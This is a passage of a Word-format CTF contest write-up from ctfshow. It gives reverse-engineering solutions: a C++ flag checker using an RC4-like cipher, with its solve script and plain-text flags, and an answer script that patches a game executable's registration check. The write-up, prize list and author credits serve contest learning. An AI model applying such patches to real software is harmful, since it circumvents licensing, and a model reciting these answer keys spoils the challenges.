              <w:t xml:space="preserve">    柒 仟 壹 佰 壹 拾 贰,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    陆 萬 叁 仟 零 佰 叁 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 仟 贰 佰 陆 拾 玖,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    陆 萬 肆 仟 捌 佰 玖 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 壹 仟 零 佰 零 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 伍 仟 捌 佰 陆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 肆 仟 肆 佰 肆 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 玖 仟 贰 佰 肆 拾 壹,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    伍 萬 柒 仟 叁 佰 捌 拾 陆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 陆 仟 柒 佰 贰 拾 叁,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    捌 仟 零 佰 陆 拾 捌,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    贰 萬 柒 仟 零 佰 壹 拾 贰,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 壹 仟 贰 佰 捌 拾 玖,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 玖 仟 伍 佰 贰 拾 陆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 玖 仟 玖 佰 叁 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 叁 仟 零 佰 陆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    伍 萬 捌 仟 贰 佰 柒 拾 伍</w:t>
              <w:br/>
              <w:t xml:space="preserve">    };</w:t>
              <w:br/>
              <w:t>常量字符错误[] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">     埃德斯塔地址请求，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     经济拒绝，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     欧克林，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     易诺联，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     EAFNO支持，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     超时，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     EILSEQ，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     已经准备好了，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     EAFNO支持，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     超时，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     进展顺利，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     关闭，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     EAFNO支持，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     埃斯塔莱，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     ENETUNREACH，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     埃多多特，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     埃斯塔莱，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     益登，</w:t>
              <w:br/>
              <w:t xml:space="preserve">     0};</w:t>
              <w:br/>
              <w:t>整型主()</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    字符串输入标志；</w:t>
              <w:br/>
              <w:t xml:space="preserve">    库特 &lt;&lt; "在此输入您的标志：" &lt;&lt; 恩德尔;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    辛 &gt;&gt; 输入标志;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    相同 格式化标志[64] = {0};</w:t>
              <w:br/>
              <w:t xml:space="preserve">    内存复制(格式化标志, 输入标志.c_str(), 输入标志.尺寸());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    向量&lt;相同&gt; 普通旗帜;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    整数计数=0；</w:t>
              <w:br/>
              <w:t xml:space="preserve">    而（真）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        如果 (格式化标志[数数] == 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            休息;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        普通旗帜.push_back(格式化标志[数数]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        数数 += 1;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    超级加密 牛肉;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    牛肉.煤气灯(错误, 0x1337);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    牛肉.加密A计划(普通旗帜);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    牛肉.加密B计划(普通旗帜);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    牛肉.加密C计划(普通旗帜);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    尝试</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        为了 (整数 我 = 0; 我 &lt; 最大限度(普通旗帜.尺寸(), 大小(回答) / 大小(回答[0])); 我++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            如果 (普通旗帜.在(我) != 回答[我])</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                扔 运行时错误("错误的答案");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捕获（例外 这是）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        库特 &lt;&lt; "检查失败！" &lt;&lt; 恩德尔;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        出口(退出失败);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    库特 &lt;&lt; "检查已接受！" &lt;&lt; 恩德尔;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    出口(退出_成功);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翻译后得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>源码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#include &lt;cstdio&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;cstdlib&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;cstring&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;string&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;cerrno&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;iostream&gt;</w:t>
              <w:br/>
              <w:t>#include &lt;vector&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>typedef unsigned short Sama;</w:t>
              <w:br/>
              <w:br/>
              <w:t>#define 萬 * 10000 +</w:t>
              <w:br/>
              <w:t>#define 仟 * 1000 +</w:t>
              <w:br/>
              <w:t>#define 佰 * 100 +</w:t>
              <w:br/>
              <w:t>#define 拾 * 10 +</w:t>
              <w:br/>
              <w:br/>
              <w:t>#define 壹 1</w:t>
              <w:br/>
              <w:t>#define 贰 2</w:t>
              <w:br/>
              <w:t>#define 叁 3</w:t>
              <w:br/>
              <w:t>#define 肆 4</w:t>
              <w:br/>
              <w:t>#define 伍 5</w:t>
              <w:br/>
              <w:t>#define 陆 6</w:t>
              <w:br/>
              <w:t>#define 柒 7</w:t>
              <w:br/>
              <w:t>#define 捌 8</w:t>
              <w:br/>
              <w:t>#define 玖 9</w:t>
              <w:br/>
              <w:t>#define 零 0</w:t>
              <w:br/>
              <w:br/>
              <w:t>struct Swarm</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Sama Peace, Love, Mail[65536];</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>using namespace std;</w:t>
              <w:br/>
              <w:br/>
              <w:t>class superEncrypt</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t>private:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Swarm Gymbag;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    string key;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Sama superNumber;</w:t>
              <w:br/>
              <w:br/>
              <w:t>public:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    void Gaslight(const char *Neuro, Sama Evil)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        this-&gt;key = string(Neuro);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        this-&gt;superNumber = Evil;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    void encryptPlanA(vector&lt;Sama&gt; &amp;plain)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int length = key.length();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int me, you, he, she;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Sama *Mail;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Gymbag.Peace = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Gymbag.Love = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Mail = Gymbag.Mail;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        for (me = 0; me &lt; 65536; me++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Mail[me] = me;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        you = he = 0;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        for (me = 0; me &lt; 65536; me++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            she = Mail[me];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            you = (Sama)(you + she + key[he]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Mail[me] = Mail[you];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Mail[you] = she;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (++he &gt;= length)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                he = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    void encryptPlanB(vector&lt;Sama&gt; &amp;plain)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int me, Peace, Love, she, it;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Sama *Mail;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Peace = Gymbag.Peace;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Love = Gymbag.Love;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Mail = Gymbag.Mail;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        size_t length = plain.size();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for (me = 0; me &lt; length; me++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Peace = (Sama)(Peace + 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            she = Mail[Peace];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Love = (Sama)(Love + she);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Mail[Peace] = it = Mail[Love];</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Mail[Love] = she;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            plain.at(me) += Mail[(Sama)(she + it)];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        Gymbag.Peace = Peace;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Gymbag.Love = Love;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    void encryptPlanC(vector&lt;Sama&gt; &amp;plain)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        size_t length = plain.size();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for (int me = 0; me &lt; length; me++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Sama res = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Sama she = plain.at(me);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Sama it = this-&gt;superNumber;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            while (it)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                if (it &amp; 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    res = (res + she);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                she = (she + she);</w:t>
              <w:br/>
              <w:t xml:space="preserve">                it = it / 2;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            plain.at(me) = res;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>// KEY YouCanTranslateIt!</w:t>
              <w:br/>
              <w:t>// MUL 0x1337</w:t>
              <w:br/>
              <w:t>// FLAG ctfshow{Oh!Y0uUndEr5t4nD7he14nguaGeN0W!}</w:t>
              <w:br/>
              <w:t>/*</w:t>
              <w:br/>
              <w:t>ctfshow{Oh!Y0uUndEr5t4nD7he14nguaGeN0W!}</w:t>
              <w:br/>
              <w:t>*/</w:t>
              <w:br/>
              <w:t>const Sama ANSWER[] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 叁 仟 陆 佰 陆 拾 捌,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 肆 仟 陆 佰 肆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    贰 萬 柒 仟 捌 佰 贰 拾 叁,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    柒 仟 壹 佰 壹 拾 贰,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    陆 萬 叁 仟 零 佰 叁 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 仟 贰 佰 陆 拾 玖,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    陆 萬 肆 仟 捌 佰 玖 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 壹 仟 零 佰 零 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 伍 仟 捌 佰 陆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 肆 仟 肆 佰 肆 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 玖 仟 贰 佰 肆 拾 壹,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    伍 萬 柒 仟 叁 佰 捌 拾 陆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 陆 仟 柒 佰 贰 拾 叁,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    捌 仟 零 佰 陆 拾 捌,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    贰 萬 柒 仟 零 佰 壹 拾 贰,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 壹 仟 贰 佰 捌 拾 玖,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    壹 萬 玖 仟 伍 佰 贰 拾 陆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    肆 萬 玖 仟 玖 佰 叁 拾 柒,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    叁 萬 叁 仟 零 佰 陆 拾 肆,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    伍 萬 捌 仟 贰 佰 柒 拾 伍</w:t>
              <w:br/>
              <w:t xml:space="preserve">    };</w:t>
              <w:br/>
              <w:t>const char ERROR[] = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EDESTADDRREQ,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ECONNREFUbeefD,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EUCLEAN,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ENOLINK,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EAFNOSUPPORT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ETIMEDOUT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EILbeefQ,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EALREADY,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EAFNOSUPPORT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ETIMEDOUT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EINPROGRESS,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ESHUTDOWN,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EAFNOSUPPORT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ESTALE,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ENETUNREACH,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EDOTDOT,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ESTALE,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    EDOM,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    0};</w:t>
              <w:br/>
              <w:t>int main()</w:t>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">    string InputFlag;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    cout &lt;&lt; "Input Your Flag Here:" &lt;&lt; endl;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    cin &gt;&gt; InputFlag;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Sama FormatedFlag[64] = {0};</w:t>
              <w:br/>
              <w:t xml:space="preserve">    memcpy(FormatedFlag, InputFlag.c_str(), InputFlag.size());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    vector&lt;Sama&gt; PlainFlag;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    int count = 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while (true)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (FormatedFlag[count] == 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            break;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        PlainFlag.push_back(FormatedFlag[count]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        count += 1;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    superEncrypt beef;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    beef.Gaslight(ERROR, 0x1337);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    beef.encryptPlanA(PlainFlag);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    beef.encryptPlanB(PlainFlag);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    beef.encryptPlanC(PlainFlag);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    try</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for (int i = 0; i &lt; max(PlainFlag.size(), sizeof(ANSWER) / sizeof(ANSWER[0])); i++)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (PlainFlag.at(i) != ANSWER[i])</w:t>
              <w:br/>
              <w:t xml:space="preserve">            {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                throw runtime_error("Wrong Answer");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catch (exception e)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        cout &lt;&lt; "Check Failed!" &lt;&lt; endl;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        exit(EXIT_FAILURE);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    cout &lt;&lt; "Check Accepted!" &lt;&lt; endl;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    exit(EXIT_SUCCESS);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exp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class RC4: </w:t>
              <w:br/>
              <w:t xml:space="preserve">    def __init__(self,key):  </w:t>
              <w:br/>
              <w:t xml:space="preserve">        '''unit tests'''  </w:t>
              <w:br/>
              <w:t xml:space="preserve">        if key == "":</w:t>
              <w:br/>
              <w:t xml:space="preserve">            raise ValueError("key can not be empyt")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if not isinstance(key, str):</w:t>
              <w:br/>
              <w:t xml:space="preserve">            raise TypeError("key must be of type String")  </w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        #generator</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self.keygenerator =  self.PRGA_YIELD( self.KSA(list(key.encode())))</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    #returns state array S</w:t>
              <w:br/>
              <w:t xml:space="preserve">    def KSA(self,key):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        s = list(range(0,65536))#internal state, array [0 - 255] </w:t>
              <w:br/>
              <w:t xml:space="preserve">        j = 0</w:t>
              <w:br/>
              <w:t xml:space="preserve">        for i in range(65536):</w:t>
              <w:br/>
              <w:t xml:space="preserve">            j = (j+s[i]+key[i%len(key)])% 65536</w:t>
              <w:br/>
              <w:t xml:space="preserve">            s[i],s[j] = s[j],s[i] #list swap</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return s</w:t>
              <w:br/>
              <w:t xml:space="preserve">    #returns keystream generator K</w:t>
              <w:br/>
              <w:t xml:space="preserve">    def PRGA_YIELD(self,S):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        i,j = 0,0</w:t>
              <w:br/>
              <w:t xml:space="preserve">        while True:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            i = (i + 1) % 65536</w:t>
              <w:br/>
              <w:t xml:space="preserve">            j = (j + S[i]) % 65536</w:t>
              <w:br/>
              <w:t xml:space="preserve">            S[i], S[j] = S[j], S[i]  # swap</w:t>
              <w:br/>
              <w:t xml:space="preserve">            K = S[(S[i] + S[j]) % 65536]</w:t>
              <w:br/>
              <w:t xml:space="preserve">            yield K</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t># Test vectors  https://en.wikipedia.org/wiki/RC4 :</w:t>
              <w:br/>
              <w:br/>
              <w:t>#example:</w:t>
              <w:br/>
              <w:t xml:space="preserve">import struct </w:t>
              <w:br/>
              <w:t xml:space="preserve">FArray = [13668, 14644, 27823, 7112, 63034, 4269, 64897, 41004, 35864, 14447, 39241, 57386, 16723, 8068, 27012, 41289, 19526, 49937, 33064, 58275] </w:t>
              <w:br/>
              <w:t>keygenerator = RC4("YouCanTranslateIt!").keygenerator</w:t>
              <w:br/>
              <w:t>for c in range(len(FArray)):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    FArray[c] = FArray[c] * pow(0x1337,-1,0x10000)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    FArray[c] = (-next(keygenerator) + FArray[c]) &amp; 0xffff</w:t>
              <w:br/>
              <w:t>ANS = [struct.pack("&lt;H",FArray[i]) for i in range(len(FArray))]</w:t>
              <w:br/>
              <w:t>print(b''.join(ANS))</w:t>
              <w:br/>
              <w:br/>
              <w:t>'''</w:t>
              <w:br/>
              <w:t>cpp</w:t>
              <w:br/>
              <w:br/>
              <w:t>Let's meet the Chinese Program Language.</w:t>
              <w:br/>
              <w:br/>
              <w:t>ctfshow{Oh!Y0uUndEr5t4nD7he14nguaGeN0W!}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'''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re3 四国军棋_套神注册码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题目名称  四国军棋_套神注册码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出题人 ThTsOd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 500分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题目描述 套神发现四国军棋下180步就强制和棋，网上找注册码发现没有，于是研究了下这个程序的注册算法，并且觉得改跳转绕过注册太low了，决定输入自己指定的注册码（keys.txt)才能注册程序,完成附件中Re1.py获取flag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[aimethod.bin]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import hashlib</w:t>
              <w:br/>
              <w:t>from Crypto.Cipher import AES</w:t>
              <w:br/>
              <w:t># 脚本需要放到 四国争霸 目录下运行</w:t>
              <w:br/>
              <w:t># 问题1：你应该修改一个外部文件(不需要./开头，直接是文件名字)</w:t>
              <w:br/>
              <w:br/>
              <w:t>FILENAME = "aimethod.bin".lower()</w:t>
              <w:br/>
              <w:br/>
              <w:t># 问题2：修改后文件的HASH(自动运算，无需填写)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"># 问题3：需要给 四国争霸.exe 打一个 32字节的Patch，找到文件修改位置，Patch内容为 32个 0-9a-f 字符 </w:t>
              <w:br/>
              <w:br/>
              <w:t>OFFSET = 0x1a2183</w:t>
              <w:br/>
              <w:t>PATCH = "cf54e9dc4e6b2fb5631532da37397a2e"</w:t>
              <w:br/>
              <w:t>assert(len(PATCH) == 32)</w:t>
              <w:br/>
              <w:t># ---- ANSWER SHEET OVER ------</w:t>
              <w:br/>
              <w:t>DATA = open(FILENAME,"rb").read()</w:t>
              <w:br/>
              <w:t>FILEHASH = hashlib.blake2b(DATA).digest()</w:t>
              <w:br/>
              <w:t>HASH1 = hashlib.blake2b(FILENAME.encode()).digest()</w:t>
              <w:br/>
              <w:t>HASH2 = FILEHASH</w:t>
              <w:br/>
              <w:t>assert(type(OFFSET) == type(-1) )</w:t>
              <w:br/>
              <w:t>HASH31 = hashlib.blake2b(str(OFFSET).encode()).digest()</w:t>
              <w:br/>
              <w:t>HASH32 = hashlib.blake2b(bytes.fromhex(PATCH)).digest()</w:t>
              <w:br/>
              <w:br/>
              <w:t>D = hashlib.blake2b(HASH1 + HASH2 + HASH31 + HASH32).digest()</w:t>
              <w:br/>
              <w:t>KEY = D[0:16]</w:t>
              <w:br/>
              <w:t>IV = D[16:32]</w:t>
              <w:br/>
              <w:t>cipher = AES.new(KEY,AES.MODE_GCM,IV)</w:t>
              <w:br/>
              <w:br/>
              <w:br/>
              <w:t>C = bytes.fromhex("592fa928073d95ffddeb59c7d58ea07d7e5316bf4f13a1c1171e2f39bd30206b733556908536fb62247af210ff5e6a4efa95b104abb9147cdbd172ca40d5467b5cb16c2829cb47d94b58d6c2c1316db1")</w:t>
              <w:br/>
              <w:t>H = bytes.fromhex("77a251b38f82ee953d07638565529468")</w:t>
              <w:br/>
              <w:t>FLAG = cipher.decrypt_and_verify(C,H)</w:t>
              <w:br/>
              <w:t>print(FLAG.decode())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#FLAG = b"ctfshow{RegisterWithYourOWNCODE!You_never_M33t_the_newfangled_Rev3rse_Challenge}"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获奖名单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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获奖榜单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本次比赛结束后，排名前5位和第66位的师傅名单如下，恭喜师傅们！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请联系ctfshow-h1xa（QQ 447685307）领奖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965"/>
        <w:gridCol w:w="1605"/>
        <w:gridCol w:w="348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积分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比赛奖励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TNT=_=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2600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现金2000元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JureGrinffin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2500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现金200元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gxngxngxn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1900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现金200元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hotwoe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1800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现金200元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chuwei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1700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现金200元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66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Arcueid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现金66元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已兑奖</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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完整榜单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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31" o:title=""/>
          </v:shape>
          <o:OLEObject DrawAspect="Icon" ObjectID="_1718471219" ProgID="Excel.Sheet.12" ShapeID="_x0000_i1025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致谢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48小时的比赛很快就结束了，希望本次比赛师傅们玩的开心！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再次感谢为了本次比赛辛苦出题的师傅们，为本次比赛提供了高质量的题目，谢谢你们！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以下为本次比赛题目出题人名单(排名不分先后)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3135"/>
        <w:gridCol w:w="295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题目名称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出题人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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web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easy_include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h1xa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easy_web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chu0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孤注一掷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h1xa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easy_login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h1xa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easy_api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h1xa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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pwn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Badboy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Zz_Zz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s.s.a.l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Zz_Zz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Happy_New_Year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Heap_Harmony_Festivity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yes_or_no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久而不念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ESCAPE GO BOX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shenghuo2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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misc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以假乱真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机气人师傅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CTF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的一生如履薄冰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王八七七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签到·又见童话镇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萌新阿狸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base-XX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Xuxuzi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Cipher of B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Bubuzi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四国军棋_网线鲨鱼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ThTsOd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四国军棋_注册码私货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ThTsOd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
